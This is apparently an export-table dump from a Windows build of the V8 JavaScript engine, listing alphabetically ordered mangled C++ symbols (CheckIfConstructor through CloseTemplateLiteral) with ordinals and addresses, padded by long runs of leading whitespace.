                                                                                                                                                                                                        ?CheckIfConstructor@JSCallReducer@compiler@internal@v8@@AEAAXPEAVNode@234@@Z41260x140fdab70
                                                                                                                                                                                                        ?CheckIfElementsKind@JSCallReducer@compiler@internal@v8@@AEAAXPEAVNode@234@W4ElementsKind@34@0PEAPEAV5234@2@Z41270x140fdb0f0
                                                                                                                                                                                                        ?CheckInOrOf@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEAW4VisitMode@ForEachStatement@23@@Z41280x140773db0
                                                                                                                                                                                                        ?CheckInitializedImpl@Internals@internal@v8@@SAXPEAVIsolate@3@@Z41290x140b0ba00
                                                                                                                                                                                                        ?CheckInstallCode@StackGuard@internal@v8@@QEAA_NXZ41300x140482b40
                                                                                                                                                                                                        ?CheckInternalizedString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41310x140f4c420
                                                                                                                                                                                                        ?CheckInterrupt@StackGuard@internal@v8@@AEAA_NW4InterruptFlag@123@@Z41320x140a007d0
                                                                                                                                                                                                        ?CheckIsolateLayout@Isolate@internal@v8@@AEAAXXZ41330x140078990
                                                                                                                                                                                                        ?CheckLogWasmCode@StackGuard@internal@v8@@QEAA_NXZ41340x140482b50
                                                                                                                                                                                                        ?CheckMaps@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@V?$Flags@W4CheckMapsFlag@compiler@internal@v8@@H@base@4@V?$ZoneHandleSet@VMap@internal@v8@@@34@AEBUFeedbackSource@234@@Z41350x140f4c430
                                                                                                                                                                                                        ?CheckMemoryIsZeroed@GCInfoTable@internal@cppgc@@AEAAXPEA_K_K@Z41360x140078990
                                                                                                                                                                                                        ?CheckMinusZeroParametersOf@compiler@internal@v8@@YAAEBVCheckMinusZeroParameters@123@PEBVOperator@123@@Z41370x14032ab80
                                                                                                                                                                                                        ?CheckNoArrayBufferBackingStores@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAAXXZ41380x1406c1d50
                                                                                                                                                                                                        ?CheckNoArrayBufferBackingStores@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAAXXZ41390x1406c1d50
                                                                                                                                                                                                        ?CheckNoDirtyFinalizationRegistries@StartupSerializer@internal@v8@@QEAAXXZ41400x1406c0bc0
                                                                                                                                                                                                        ?CheckNotAtStart@RegExpBytecodeGenerator@internal@v8@@UEAAXHPEAVLabel@23@@Z41410x14073cf00
                                                                                                                                                                                                        ?CheckNotAtStart@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z41420x1404ab070
                                                                                                                                                                                                        ?CheckNotBackReference@RegExpBytecodeGenerator@internal@v8@@UEAAXH_NPEAVLabel@23@@Z41430x14073cf80
                                                                                                                                                                                                        ?CheckNotBackReference@RegExpMacroAssemblerX64@internal@v8@@UEAAXH_NPEAVLabel@23@@Z41440x1404ab180
                                                                                                                                                                                                        ?CheckNotBackReferenceIgnoreCase@RegExpBytecodeGenerator@internal@v8@@UEAAXH_N0PEAVLabel@23@@Z41450x14073d010
                                                                                                                                                                                                        ?CheckNotBackReferenceIgnoreCase@RegExpMacroAssemblerX64@internal@v8@@UEAAXH_N0PEAVLabel@23@@Z41460x1404ab620
                                                                                                                                                                                                        ?CheckNotCharacter@RegExpBytecodeGenerator@internal@v8@@UEAAXIPEAVLabel@23@@Z41470x14073d0a0
                                                                                                                                                                                                        ?CheckNotCharacter@RegExpMacroAssemblerX64@internal@v8@@UEAAXIPEAVLabel@23@@Z41480x1404abdc0
                                                                                                                                                                                                        ?CheckNotCharacterAfterAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXIIPEAVLabel@23@@Z41490x14073d140
                                                                                                                                                                                                        ?CheckNotCharacterAfterAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXIIPEAVLabel@23@@Z41500x1404abe30
                                                                                                                                                                                                        ?CheckNotCharacterAfterMinusAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXGGGPEAVLabel@23@@Z41510x14073d1f0
                                                                                                                                                                                                        ?CheckNotCharacterAfterMinusAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGGPEAVLabel@23@@Z41520x1404abf00
                                                                                                                                                                                                        ?CheckNotTaggedHole@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41530x140f4c500
                                                                                                                                                                                                        ?CheckNumber@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z41540x1410a0c70
                                                                                                                                                                                                        ?CheckNumber@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41550x140f4c510
                                                                                                                                                                                                        ?CheckObjectType@internal@v8@@YA_K_K00@Z41560x140450810
                                                                                                                                                                                                        ?CheckPageFlag@TurboAssembler@internal@v8@@QEAAXVRegister@23@0HW4Condition@23@PEAVLabel@23@W4Distance@623@@Z41570x140502010
                                                                                                                                                                                                        ?CheckParams@WriteBarrier@internal@cppgc@@SAXW4Type@123@AEBUParams@123@@Z41580x140078990
                                                                                                                                                                                                        ?CheckPointerImpl@EnabledCheckingPolicy@internal@cppgc@@AEAAXPEBX_N@Z41590x140457110
                                                                                                                                                                                                        ?CheckPosition@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z41600x1404ac040
                                                                                                                                                                                                        ?CheckPossibleEvalCall@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4PossiblyEval@Call@23@PEAVExpression@23@_NPEAVScope@23@@Z41610x140773e20
                                                                                                                                                                                                        ?CheckPreemption@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ41620x1404ac190
                                                                                                                                                                                                        ?CheckReceiver@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41630x140f4c650
                                                                                                                                                                                                        ?CheckReceiverOrNullOrUndefined@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41640x140f4c660
                                                                                                                                                                                                        ?CheckRegion@RegionAllocator@base@v8@@QEAA_K_K@Z41650x140e6cb40
                                                                                                                                                                                                        ?CheckRehashability@ContextSerializer@internal@v8@@AEAAXVHeapObject@23@@Z41660x1406d92c0
                                                                                                                                                                                                        ?CheckSmi@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41670x140f4c670
                                                                                                                                                                                                        ?CheckSmi@TurboAssembler@internal@v8@@QEAA?AW4Condition@23@VOperand@23@@Z41680x1405021d0
                                                                                                                                                                                                        ?CheckSmi@TurboAssembler@internal@v8@@QEAA?AW4Condition@23@VRegister@23@@Z41690x140502210
                                                                                                                                                                                                        ?CheckSpecialCharacterClass@RegExpMacroAssemblerX64@internal@v8@@UEAA_NGPEAVLabel@23@@Z41700x1404ac220
                                                                                                                                                                                                        ?CheckStackAlignment@TurboAssembler@internal@v8@@QEAAXXZ41710x140502240
                                                                                                                                                                                                        ?CheckStackGuardState@RegExpMacroAssemblerX64@internal@v8@@SAHPEA_K_K1@Z41720x1404ac960
                                                                                                                                                                                                        ?CheckStackLimit@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ41730x1404ac9a0
                                                                                                                                                                                                        ?CheckStackOverflow@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXXZ41740x140773ea0
                                                                                                                                                                                                        ?CheckStrictOctalLiteral@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXHH@Z41750x140773ed0
                                                                                                                                                                                                        ?CheckString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41760x140f4c750
                                                                                                                                                                                                        ?CheckSubsample@CpuProfile@internal@v8@@QEAA_NVTimeDelta@base@3@@Z41770x14074d830
                                                                                                                                                                                                        ?CheckSymbol@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41780x140f4c830
                                                                                                                                                                                                        ?CheckTemplateEscapes@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_N_N@Z41790x140773f60
                                                                                                                                                                                                        ?CheckTerminateExecution@StackGuard@internal@v8@@QEAA_NXZ41800x140482b60
                                                                                                                                                                                                        ?CheckValue@TracedReferenceBase@v8@@IEBAXXZ41810x140b0ba80
                                                                                                                                                                                                        ?CheckWasmCodeGC@StackGuard@internal@v8@@QEAA_NXZ41820x140482b70
                                                                                                                                                                                                        ?CheckWrapper@JSHeapConsistency@v8@@CAXAEAV?$Local@VObject@v8@@@2@HPEBX@Z41830x1409e9590
                                                                                                                                                                                                        ?CheckedFloat64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z41840x140f4c840
                                                                                                                                                                                                        ?CheckedFloat64ToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z41850x140f4c950
                                                                                                                                                                                                        ?CheckedInt32Add@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41860x140f4ca60
                                                                                                                                                                                                        ?CheckedInt32Div@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41870x140f4ca70
                                                                                                                                                                                                        ?CheckedInt32Mod@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41880x140f4ca80
                                                                                                                                                                                                        ?CheckedInt32Mul@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@@Z41890x140f4ca90
                                                                                                                                                                                                        ?CheckedInt32Sub@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41900x140f4cad0
                                                                                                                                                                                                        ?CheckedInt32ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41910x140f4cae0
                                                                                                                                                                                                        ?CheckedInt64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41920x140f4cbc0
                                                                                                                                                                                                        ?CheckedInt64ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41930x140f4cca0
                                                                                                                                                                                                        ?CheckedTaggedSignedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41940x140f4cd80
                                                                                                                                                                                                        ?CheckedTaggedToArrayIndex@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41950x140f4ce60
                                                                                                                                                                                                        ?CheckedTaggedToFloat64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckTaggedInputMode@234@AEBUFeedbackSource@234@@Z41960x140f4cf40
                                                                                                                                                                                                        ?CheckedTaggedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z41970x140f4d070
                                                                                                                                                                                                        ?CheckedTaggedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@AEBUFeedbackSource@234@@Z41980x140f4d180
                                                                                                                                                                                                        ?CheckedTaggedToTaggedPointer@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z41990x140f4d290
                                                                                                                                                                                                        ?CheckedTaggedToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z42000x140f4d370
                                                                                                                                                                                                        ?CheckedTruncateTaggedToWord32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckTaggedInputMode@234@AEBUFeedbackSource@234@@Z42010x140f4d450
                                                                                                                                                                                                        ?CheckedUint32Bounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z42020x140f4d580
                                                                                                                                                                                                        ?CheckedUint32Div@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42030x140f4d6d0
                                                                                                                                                                                                        ?CheckedUint32Mod@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42040x140f4d6e0
                                                                                                                                                                                                        ?CheckedUint32ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z42050x140f4d6f0
                                                                                                                                                                                                        ?CheckedUint32ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z42060x140f4d7d0
                                                                                                                                                                                                        ?CheckedUint64Bounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z42070x140f4d8b0
                                                                                                                                                                                                        ?CheckedUint64ToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z42080x140f4da00
                                                                                                                                                                                                        ?CheckedUint64ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z42090x140f4dae0
                                                                                                                                                                                                        ?Checkpoint@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ42100x140eb25e0
                                                                                                                                                                                                        ?Checkpoint@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@VFrameState@234@@Z42110x140f598b0
                                                                                                                                                                                                        ?Checksum@internal@v8@@YAIV?$Vector@$$CBE@base@2@@Z42120x1406c4530
                                                                                                                                                                                                        ?Clamp@Bignum@base@v8@@AEAAXXZ42130x140e705e0
                                                                                                                                                                                                        ?Class@FieldType@internal@v8@@SA?AV123@VMap@23@@Z42140x140078b40
                                                                                                                                                                                                        ?Class@FieldType@internal@v8@@SA?AV?$Handle@VFieldType@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@@Z42150x140878290
                                                                                                                                                                                                        ?ClassFieldVariableName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEBVAstRawString@23@PEAVAstValueFactory@23@H@Z42160x140773fd0
                                                                                                                                                                                                        ?ClassFieldsSymbolConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ42170x14091af40
                                                                                                                                                                                                        ?ClassOf@ControlEquivalence@compiler@internal@v8@@QEAA_KPEAVNode@234@@Z42180x14104f580
                                                                                                                                                                                                        ?ClassPropertyKindFor@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA?AW4Kind@ClassLiteralProperty@23@W4ParsePropertyKind@23@@Z42190x140774200
                                                                                                                                                                                                        ?ClassifyArrowParameter@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAV?$AccumulationScope@U?$ParserTypes@VParser@internal@v8@@@internal@v8@@@23@HPEAVExpression@23@@Z42200x140774250
                                                                                                                                                                                                        ?ClassifyParameter@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@HH@Z42210x140774400
                                                                                                                                                                                                        ?CleanupOnStackReferencesBelowCurrentStackPosition@GlobalHandles@internal@v8@@QEAAXXZ42220x1409f56a0
                                                                                                                                                                                                        ?Clear@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA?AV?$Handle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V423@@Z42230x1407e34c0
                                                                                                                                                                                                        ?Clear@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA?AV?$Handle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V423@@Z42240x1407e35e0
                                                                                                                                                                                                        ?Clear@?$OrderedHashTable@VOrderedNameDictionary@internal@v8@@$02@internal@v8@@SA?AV?$Handle@VOrderedNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@@Z42250x1407e3700
                                                                                                                                                                                                        ?Clear@AddressToTraceMap@internal@v8@@QEAAXXZ42260x140763520
                                                                                                                                                                                                        ?Clear@BackingStore@internal@v8@@AEAAXXZ42270x1408c96b0
                                                                                                                                                                                                        ?Clear@BitVector@internal@v8@@QEAAXXZ42280x1404bb5f0
                                                                                                                                                                                                        ?Clear@CodeMap@internal@v8@@QEAAXXZ42290x14074d860
                                                                                                                                                                                                        ?Clear@CodeObjectRegistry@internal@v8@@QEAAXXZ42300x1409f2020
                                                                                                                                                                                                        ?Clear@CompilationCache@internal@v8@@QEAAXXZ42310x140ab0860
                                                                                                                                                                                                        ?Clear@FeedbackNexus@internal@v8@@QEAA_NXZ42320x140879140
                                                                                                                                                                                                        ?Clear@FreeList@internal@cppgc@@QEAAXXZ42330x140466ec0
                                                                                                                                                                                                        ?Clear@IdentityMapBase@internal@v8@@IEAAXXZ42340x1406b4380
                                                                                                                                                                                                        ?Clear@Map@v8@@QEAAXXZ42350x140b0bb50
                                                                                                                                                                                                        ?Clear@MarkingWorklists@internal@v8@@QEAAXXZ42360x140976360
                                                                                                                                                                                                        ?Clear@NativeContextStats@internal@v8@@QEAAXXZ42370x1409710f0
                                                                                                                                                                                                        ?Clear@OSROptimizedCodeCache@internal@v8@@SAXVNativeContext@23@@Z42380x1407df870
                                                                                                                                                                                                        ?Clear@ObjectStartBitmap@internal@cppgc@@QEAAXXZ42390x14044fa80
                                                                                                                                                                                                        ?Clear@SegmentBase@internal@base@heap@@QEAAXXZ42400x14045e140
                                                                                                                                                                                                        ?Clear@Set@v8@@QEAAXXZ42410x140b0bbd0
                                                                                                                                                                                                        ?Clear@StubCache@internal@v8@@QEAAXXZ42420x14093fb40
                                                                                                                                                                                                        ?Clear@WeakCodeRegistry@internal@v8@@QEAAXXZ42430x140744a60
                                                                                                                                                                                                        ?ClearAllBreakPoints@Debug@internal@v8@@AEAAXXZ42440x140a5dce0
                                                                                                                                                                                                        ?ClearAllDebugInfos@Debug@internal@v8@@AEAAXAEBV?$function@$$A6AXV?$Handle@VDebugInfo@internal@v8@@@internal@v8@@@Z@std@@@Z42450x140a5de10
                                                                                                                                                                                                        ?ClearAllDebuggerHints@Debug@internal@v8@@AEAAXXZ42460x140a5df90
                                                                                                                                                                                                        ?ClearAllUsedNodes@CrossThreadPersistentRegion@internal@cppgc@@QEAAXXZ42470x140457870
                                                                                                                                                                                                        ?ClearAllUsedNodes@PersistentRegion@internal@cppgc@@QEAAXXZ42480x1404572b0
                                                                                                                                                                                                        ?ClearAllWorklistsForTesting@MarkerBase@internal@cppgc@@QEAAXXZ42490x14045e150
                                                                                                                                                                                                        ?ClearAllocatorState@PagedSpace@internal@v8@@QEAAXXZ42500x140482b80
                                                                                                                                                                                                        ?ClearApiInterrupt@StackGuard@internal@v8@@QEAAXXZ42510x140482ba0
                                                                                                                                                                                                        ?ClearBlockById@Schedule@compiler@internal@v8@@QEAAXVId@BasicBlock@234@@Z42520x140ee2280
                                                                                                                                                                                                        ?ClearBreakInfo@DebugInfo@internal@v8@@QEAAXPEAVIsolate@23@@Z42530x1408ba800
                                                                                                                                                                                                        ?ClearBreakOnNextFunctionCall@Debug@internal@v8@@QEAAXXZ42540x140a5dff0
                                                                                                                                                                                                        ?ClearBreakOnNextFunctionCall@debug@v8@@YAXPEAVIsolate@2@@Z42550x140a6dfe0
                                                                                                                                                                                                        ?ClearBreakPoint@Debug@internal@v8@@QEAAXV?$Handle@VBreakPoint@internal@v8@@@23@@Z42560x140a5e020
                                                                                                                                                                                                        ?ClearBreakPoint@WasmScript@internal@v8@@SA_NV?$Handle@VScript@internal@v8@@@23@HV?$Handle@VBreakPoint@internal@v8@@@23@@Z42570x14055fb30
                                                                                                                                                                                                        ?ClearBreakPointById@WasmScript@internal@v8@@SA_NV?$Handle@VScript@internal@v8@@@23@H@Z42580x14055fe10
                                                                                                                                                                                                        ?ClearBreakPoints@Debug@internal@v8@@AEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z42590x140a5e160
                                                                                                                                                                                                        ?ClearCachedIcuObjects@Isolate@internal@v8@@QEAAXXZ42600x140a0de00
                                                                                                                                                                                                        ?ClearCachesForTesting@Isolate@v8@@QEAAXXZ42610x140b0bc50
                                                                                                                                                                                                        ?ClearCodeMap@ProfilerCodeObserver@internal@v8@@QEAAXXZ42620x1407611c0
                                                                                                                                                                                                        ?ClearCodesInRange@CodeMap@internal@v8@@QEAAX_K0@Z42630x14074d910
                                                                                                                                                                                                        ?ClearDataTableEntry@SwissNameDictionary@internal@v8@@AEAAXPEAVIsolate@23@H@Z42640x140482bb0
                                                                                                                                                                                                        ?ClearDebugBreak@BreakIterator@internal@v8@@QEAAXXZ42650x140a5e450
                                                                                                                                                                                                        ?ClearDeoptMarkedAllocationSites@StackGuard@internal@v8@@QEAAXXZ42660x140482c00
                                                                                                                                                                                                        ?ClearEmbeddedBlob@Isolate@internal@v8@@AEAAXXZ42670x140a0de10
                                                                                                                                                                                                        ?ClearEntry@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z42680x140482c10
                                                                                                                                                                                                        ?ClearEntry@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z42690x140482d00
                                                                                                                                                                                                        ?ClearEntry@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z42700x1407f3150
                                                                                                                                                                                                        ?ClearEntry@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@@Z42710x1407f3200
                                                                                                                                                                                                        ?ClearEntry@GlobalDictionary@internal@v8@@QEAAXVInternalIndex@23@@Z42720x140482db0
                                                                                                                                                                                                        ?ClearEntry@OSROptimizedCodeCache@internal@v8@@AEAAXHPEAVIsolate@23@@Z42730x1407df910
                                                                                                                                                                                                        ?ClearForThread@WriteBarrier@internal@v8@@SAXPEAVMarkingBarrier@23@@Z42740x1409c6580
                                                                                                                                                                                                        ?ClearGC@StackGuard@internal@v8@@QEAAXXZ42750x140482dd0
                                                                                                                                                                                                        ?ClearGrowSharedMemory@StackGuard@internal@v8@@QEAAXXZ42760x140482de0
                                                                                                                                                                                                        ?ClearInputs@Node@compiler@internal@v8@@AEAAXHH@Z42770x140ea2a30
                                                                                                                                                                                                        ?ClearInstallCode@StackGuard@internal@v8@@QEAAXXZ42780x140482df0
                                                                                                                                                                                                        ?ClearInterrupt@StackGuard@internal@v8@@AEAAXW4InterruptFlag@123@@Z42790x140a00820
                                                                                                                                                                                                        ?ClearInvalidSlots@TypedSlotSet@internal@v8@@QEAAXAEBV?$map@IIU?$less@I@std@@V?$allocator@U?$pair@$$CBII@std@@@2@@std@@@Z42800x140956fd0
                                                                                                                                                                                                        ?ClearKeptObjects@Isolate@internal@v8@@QEAAXXZ42810x140a0df30
                                                                                                                                                                                                        ?ClearKeptObjects@Isolate@v8@@QEAAXXZ42820x140b0bc70
                                                                                                                                                                                                        ?ClearLiteral@UnoptimizedCompilationInfo@internal@v8@@QEAAXXZ42830x140643100
                                                                                                                                                                                                        ?ClearLogWasmCode@StackGuard@internal@v8@@QEAAXXZ42840x140482e00
                                                                                                                                                                                                        ?ClearMemoryChunkData@ConcurrentMarking@internal@v8@@QEAAXPEAVMemoryChunk@23@@Z42850x1409ec830
                                                                                                                                                                                                        ?ClearMentionedObjectCache@StringStream@internal@v8@@SAXPEAVIsolate@23@@Z42860x1406bd810
                                                                                                                                                                                                        ?ClearObjectIds@HeapProfiler@v8@@QEAAXXZ42870x140b0bc80
                                                                                                                                                                                                        ?ClearOneShot@Debug@internal@v8@@AEAAXXZ42880x140a5e4a0
                                                                                                                                                                                                        ?ClearPredecessors@BasicBlock@compiler@internal@v8@@QEAAXXZ42890x1404c1af0
                                                                                                                                                                                                        ?ClearReconstructableDataForSerialization@Snapshot@internal@v8@@SAXPEAVIsolate@23@_N@Z42900x1406c1d90
                                                                                                                                                                                                        ?ClearRegisters@RegExpBytecodeGenerator@internal@v8@@UEAAXHH@Z42910x14073d290
                                                                                                                                                                                                        ?ClearRegisters@RegExpMacroAssemblerX64@internal@v8@@UEAAXHH@Z42920x1404aca30
                                                                                                                                                                                                        ?ClearSegment@DateCache@internal@v8@@AEAAXPEAUDST@123@@Z42930x140a79390
                                                                                                                                                                                                        ?ClearSerializerData@Isolate@internal@v8@@QEAAXXZ42940x140a0df40
                                                                                                                                                                                                        ?ClearSideEffectChecks@Debug@internal@v8@@QEAAXV?$Handle@VDebugInfo@internal@v8@@@23@@Z42950x140a5e500
                                                                                                                                                                                                        ?ClearStepping@Debug@internal@v8@@QEAAXXZ42960x140a5e6c0
                                                                                                                                                                                                        ?ClearStepping@DebugInfo@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z42970x14055ff80
                                                                                                                                                                                                        ?ClearStepping@DebugInfo@wasm@internal@v8@@QEAAXPEAVWasmFrame@34@@Z42980x14055ffe0
                                                                                                                                                                                                        ?ClearStringPaddingIfNeeded@ReadOnlySpace@internal@v8@@QEAAXXZ42990x140962ee0
                                                                                                                                                                                                        ?ClearSuccessors@BasicBlock@compiler@internal@v8@@QEAAXXZ43000x1404c1b00
                                                                                                                                                                                                        ?ClearTerminateExecution@StackGuard@internal@v8@@QEAAXXZ43010x140482e10
                                                                                                                                                                                                        ?ClearWasmCodeGC@StackGuard@internal@v8@@QEAAXXZ43020x140482e20
                                                                                                                                                                                                        ?ClearWeak@V8@v8@@CAPEAXPEA_K@Z43030x140b0bc90
                                                                                                                                                                                                        ?ClearWeakness@GlobalHandles@internal@v8@@SAPEAXPEA_K@Z43040x1409f56b0
                                                                                                                                                                                                        ?ClearedTypedSlot@TypedSlotSet@internal@v8@@CA?AUTypedSlot@TypedSlots@23@XZ43050x140482e30
                                                                                                                                                                                                        ?ClobbersDoubleRegisters@Instruction@compiler@internal@v8@@QEBA_NXZ43060x1404bb630
                                                                                                                                                                                                        ?ClobbersRegisters@Instruction@compiler@internal@v8@@QEBA_NXZ43070x1404bb630
                                                                                                                                                                                                        ?ClobbersTemps@Instruction@compiler@internal@v8@@QEBA_NXZ43080x1404bb630
                                                                                                                                                                                                        ?Clone@Node@compiler@internal@v8@@SAPEAV1234@PEAVZone@34@IPEBV1234@@Z43090x140ea2ad0
                                                                                                                                                                                                        ?Clone@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ43100x140b0bca0
                                                                                                                                                                                                        ?CloneNode@Graph@compiler@internal@v8@@QEAAPEAVNode@234@PEBV5234@@Z43110x140f54380
                                                                                                                                                                                                        ?CloneObject@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@HH@Z43120x14091af50
                                                                                                                                                                                                        ?CloneObject@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@H@Z43130x140f3ab30
                                                                                                                                                                                                        ?CloneScript@Factory@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@23@V423@@Z43140x1409cf3b0
                                                                                                                                                                                                        ?Close@AllowCompilation@internal@v8@@SAXPEAVIsolate@23@_N@Z43150x140496db0
                                                                                                                                                                                                        ?Close@AllowDeoptimization@internal@v8@@SAXPEAVIsolate@23@_N@Z43160x140496f60
                                                                                                                                                                                                        ?Close@AllowExceptions@internal@v8@@SAXPEAVIsolate@23@_N@Z43170x140497c50
                                                                                                                                                                                                        ?Close@AllowJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z43180x140497590
                                                                                                                                                                                                        ?Close@DisallowCompilation@internal@v8@@SAXPEAVIsolate@23@_N@Z43190x140496db0
                                                                                                                                                                                                        ?Close@DisallowDeoptimization@internal@v8@@SAXPEAVIsolate@23@_N@Z43200x140496f60
                                                                                                                                                                                                        ?Close@DisallowExceptions@internal@v8@@SAXPEAVIsolate@23@_N@Z43210x140497c50
                                                                                                                                                                                                        ?Close@DisallowJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z43220x140497590
                                                                                                                                                                                                        ?Close@DumpOnJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z43230x1404975a0
                                                                                                                                                                                                        ?Close@NoDumpOnJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z43240x1404975a0
                                                                                                                                                                                                        ?Close@NoThrowOnJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z43250x1404975b0
                                                                                                                                                                                                        ?Close@ThrowOnJavascriptExecution@internal@v8@@SAXPEAVIsolate@23@_N@Z43260x1404975b0
                                                                                                                                                                                                        ?CloseAndMakeIterable@LocalAllocationBuffer@internal@v8@@QEAA?AVLinearAllocationArea@23@XZ43270x140956040
                                                                                                                                                                                                        ?CloseMainThreadScope@LocalHandleScope@internal@v8@@CAXPEAVLocalHeap@23@PEA_K1@Z43280x1409f42a0
                                                                                                                                                                                                        ?CloseTemplateLiteral@Parser@internal@v8@@AEAAPEAVExpression@23@PEAPEAVTemplateLiteral@123@HPEAV423@@Z43290x1407a46d0
